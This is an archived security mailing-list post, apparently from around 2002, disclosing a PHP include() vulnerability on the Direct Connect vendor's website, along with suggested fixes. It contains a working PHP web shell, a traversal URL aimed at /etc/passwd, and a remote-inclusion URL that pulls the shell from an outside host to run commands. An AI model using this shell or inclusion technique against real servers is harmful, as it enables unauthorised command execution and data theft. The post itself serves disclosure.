lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <18636.1033538486@www47.gmx.net>
From: burpz at gmx.net (burpz@....net)
Subject: PHP execution vulnerability on www.neo-modus.com (direct connect homepage)

> neo-modus.com is the home of the quite popular file sharing utility
> 'direct
> connect', unfortunately their website is vulnerable to a common php
> include()
> vulnerability. Message below was send 2 weeks ago to the 'bugs' email
> address listed on their website. I didn't get any response.
> 
> --- Forwarded Message ---
> > Dear Reader,
> > 
> > I recently stumbled across your website www.neo-modus.com, I fiddled
> > around
> > a bit with the .php scripts, and found that they are vulnerable to a
> very
> > common php error.
> > 
> > The index.php script takes a parameter 'page', so it knows what page to
> > show. It then passes the value of this parameter DIRECTLY into a
> include()
> > statement. This is very, very bad. Let's say I go to the url:
> > http://www.neo-modus.com/?page=/etc/passwd - this tries to open
> > /etc/passwd.html - so i can break
> > out of the document root and view every file with an .html (or .php?)
> > extension. This seems not too bad, but there's more. PHP has a feature
> > called
> > "furl_open", which allows include() to take an URL as a parameter to
> > include it in
> > it's page. So we create a text file on a different webserver (which
> doesnt
> > parse .txt files) called test.txt, which contains:
> > 
> > <?php
> >   printf("<div align=\"left\"><pre>");
> >   printf("%s", nl2br(system($HTTP_GET_VARS['cmd'])));
> >   printf("</pre></div>");
> > ?>
> > 
> > we then go to the url
> > http://www.neo-modus.com/?page=http://my.webpage.com/test.txt&cmd=ls -al
> > 
> > and we get a nice "ls -al" output runned on YOUR webserver. We can run
> all
> > commands with privileges of the webserver. I think you can understand
> how
> > bad
> > this is.
> > 
> > To fix these issues, I suggest you disable furl_open in the php
> > configuration file, and filter the "page" parameter passed to index.php
> so
> > that it strips
> > slashes, backslashes, dots and limits it to a specific directory only.
> > 
> > Another thing: don't place files which contain password information in
> the
> > document root. ConnectToDatabase.php contains sensitive information.
> > Change
> > your mysql passwords, and limit access to the mysql server from YOUR
> > website
> > host only. I could connect without problems - this should not be the
> case.
> > 

-- 
+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
NEU: Mit GMX ins Internet. G?nstige DSL- & Modem/ISDN-Tarife!


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ